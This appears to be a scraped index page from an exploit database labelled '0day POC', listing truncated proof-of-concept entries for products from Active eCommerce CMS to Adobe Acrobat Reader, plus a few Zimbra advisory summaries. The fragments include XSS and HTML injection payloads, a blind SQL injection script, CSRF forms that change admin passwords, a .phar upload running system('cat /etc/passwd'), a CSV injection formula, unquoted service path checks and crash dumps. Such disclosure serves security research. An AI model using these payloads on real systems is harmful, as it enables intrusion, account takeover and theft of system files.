?day POC 漏洞数据库

# Exploit Title: Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS) # Date: 19/01/2023 # Exploit Author: Sajibe Kanti # Vendor Name: ActiveITzone # Vendor Homepage: https://activeitzone.com/ # Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405 # Version: 6.5.0 # Tested on: Live ( Centos & Litespeed Web Server) # Demo Link : https://demo.activeitzone.com/ecommerce/ # Description # The Active eCommerce CMS 6.5.0 application has a vulnerability in the profile picture upload feature that allows for stored cross-site scripting (XSS) attacks. Specifically, the vulnerability lies in the handling of "svg" image files, which can contain mali…

# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 Release Date: 2023-07-04 Vulnerability Laboratory ID (VL-ID): 2278 Common Vulnerability Scoring System: 5.4 Product & Service Introduction: =============================== https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. Affected Product(s): ==================== Act…

# Exploit Title: Active WebCam 11.5 - Unquoted Service Path # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date: 09.09.2021 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html # Vendor Homepage: https://www.pysoft.com/ # Version: 11.5 # Tested on: Windows 10 # Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options # Proof of Concept: C:\Users\death>sc qc ACTIVEWEBCAM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ACTIVEWEBCAM TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY…

# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Version : ActiveFax Server 6.92 Build 0316 # Tested on Windows 10 # CVE : N/A sc qc ActiveFaxServiceNT [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveFaxServiceNT TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe LOAD_ORDER_GROUP : …

# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service # Date: 2019-10-12 # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Exploit Author: Achilles # Tested Version: 6.92 # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run python code : ActiveFax_Server.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open ActiveFaxServer.exe # 4.- Open the Pop3 Server Config # 5.- Press New # 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password' # 7.- Pre…

# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-21 # Software Version : ActivIdentity 8.2 # Vendor Homepage : https://www.hidglobal.com/ # Tested on OS: Windows 7 Pro # ActivIdentity was Acquired by HID Global in Octuber 2010 #ActivClient is a desktop authentication software that uses smarts cards and readers # for enterprise, government and commercial establishments #Analyze PoC : ============== C:\Users\DSAdsi>sc qc ac.sharedstore [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ac.sharedstore TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO…

# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE) # Exploit Author: Chan Nyein Wai & Thura Moe Myint # Vendor Homepage: https://www.manageengine.com/products/ad-manager/ # Software Link: https://www.manageengine.com/products/ad-manager/download.html # Version: Ad Manager Plus Before 7122 # Tested on: Windows # CVE : CVE-2021-44228 # Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md ### Description In the summer of 2022, I have been doing security engagement on Synack Red Team in the collaboration with my good friend (Thura Moe Myint). At that time, Log4j was already widespread on the internet. Manage Engi…

#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2020-01-05 #Vendor Homepage : http://webcompanion.com/ #Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2 #Tested on OS: Windows 10 #Analyze PoC : ============== C:\Users\ZwX>sc qc WCAssistantService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program…

# Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path # Date: 2019-11-06 # Exploit Author: Mariela L Martínez Hdez # Vendor Homepage: https://webcompanion.com/en/ # Software Link: https://webcompanion.com/en/ # Version: Adaware Web Companion version 4.8.2078.3950 # Tested on: Windows 10 Home (64 bits) # 1. Description # Adaware Web Companion version 4.8.2078.3950 service 'WCAssistantService' has an unquoted service path. # 2. PoC C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" WC Assistant WCAssistantService C:\Program …

Added additional validations for 2FA login. Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 07/06/2023 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue in Zimbra Collaboration (ZCS) v.8.8.15 and v.9.0 allows a remote attacker to escalate privileges and obtain sensitive information via the password and 2FA parameters. Solution(s) zimbra-collaboration-upgrade-latest References https://attackerkb.com/topics/cve-2023-29381 CVE - 2023-29381 https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy

# Title: addressbook 9.0.0.1 - 'id' SQL Injection # Date: 2020-04-01 # Author: David Velazquez a.k.a. d4sh&r000 # vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download # vulnerable version: 9.0.0.1 # Discription: addressbook 9.0.0.1 time-based blind SQL injection # Tested On: Ubuntu Server 20.04 LTS # Platform: PHP # Type: webapp # Use: # addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1' #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import requests def isVulnerable(URL): """Check if the URL is vulnerable to ime-based blind SQL injection""" response = requests.get(URL+'%27%20AND%20(SELECT%207812%2…

Addressed XSS vulnerability in zimbraAdmin interface due to non sanitised parameter Severity 5 CVSS (AV:N/AC:L/Au:S/C:P/I:P/A:N) Published 08/12/2024 Created 01/16/2025 Added 01/10/2025 Modified 01/20/2025 Description An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0, issue 1 of 2. A reflected cross-site scripting (XSS) vulnerability has been identified in the Zimbra webmail admin interface. This vulnerability occurs due to inadequate input validation of the packages parameter, allowing an authenticated attacker to inject and execute arbitrary JavaScript code within the context of another user's browser session. By uploading a malic…

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting # Date: 2023.Aug.01 # Exploit Author: Pedro (ISSDU TW) # Vendor Homepage: https://loganalyzer.adiscon.com/ # Software Link: https://loganalyzer.adiscon.com/download/ # Version: v4.1.13 and before # Tested on: Linux # CVE : CVE-2023-36306 There are several installation method. If you installed without database(File-Based),No need to login. If you installed with database, You should login with Read Only User(at least) XSS Payloads are as below: XSS http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E http://[ip address]/logan…

# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF) # Date:02/08/2019. # Exploit Author: Pablo Santiago # Vendor Homepage: https://adive.es # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.7 # Tested on: Windows and Kali linux # CVE :2019-14346 # 1. Technical Description: # Adive Framework 2.0.7 and possibly before are affected by Cross-Site #Request Forgery vulnerability, an attacker could change any user password. # 2. Proof Of Concept (CODE): <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/adive/admin/config" method="POST"> &lt…

# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation # Date: 2019-08-02 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.7 # Tested on: Windows 10 # CVE : CVE-2019-14347 #Exploit import requests import sys session = requests.Session() http_proxy = "http://127.0.0.1:8080" https_proxy = "https://127.0.0.1:8080" proxyDict = { "http" : http_proxy, "https" : https_proxy } print('[*****************************************]') print('[ BYPASSING Adive Framework Version.2.0.5 ]') print('[****************************************…

# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Sarthak Saini # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # CVE:CVE-2020-7991 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.…

# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting # Exploit Author: Sarthak Saini # Dork: N/A # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # Category: Webapps # Tested on: windows64bit / mozila firefox 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,applicati…

# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure # Exploit Author: CraCkEr # Date: 25/07/2023 # Vendor: Templatecookie # Vendor Homepage: https://templatecookie.com/ # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script # Version: 2.14.0 # Tested on: Windows 10 Pro # Impact: Sensitive Information Leakage # CVE: CVE-2023-4168 ## Description Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. ## Steps to Reproduce: When you visit any page on the websi…

Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE) Application: Admidio Version: 4.2.10 Bugs: RCE Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 10.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to account 2. Go to Announcements 3. Add Entry 4. Upload .phar file in image upload section. .phar file Content <?php echo system('cat /etc/passwd');?> 5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar ) Request: POST /admidio/a…

Exploit Title: admidio v4.2.5 - CSV Injection Application: admidio Version: 4.2.5 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 26.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and…

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) # Date: 21.12.2022 # Exploit Author: kv1to # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 # Tested on: Raspbian / Debian # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 # CVE : CVE-2022-23513 In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. ## Proof Of Concept with curl: curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' ##…

-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop so…

-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop so…

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34 eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 CoolType!CTInit+0x3913e: 10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194 0:000> u @eip-14 CoolType!CTInit+0x3912a: 10e6c28a 8b7d0c…

We have observed the following crash in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- ======================================= VERIFIER STOP 00000007: pid 0x2C1C: Heap block already freed. 0C441000 : Heap handle for the heap owning the block. 147E6638 : Heap block being freed again. 00000010 : Size of the heap block. 00000000 : Not used ======================================= This verifier stop is not continuable. Process will be terminated when you use the `go' debugger command. ======================================= (2c1c.491c): Break instruction exception - code 80000003 (first chance) eax=66e603a0…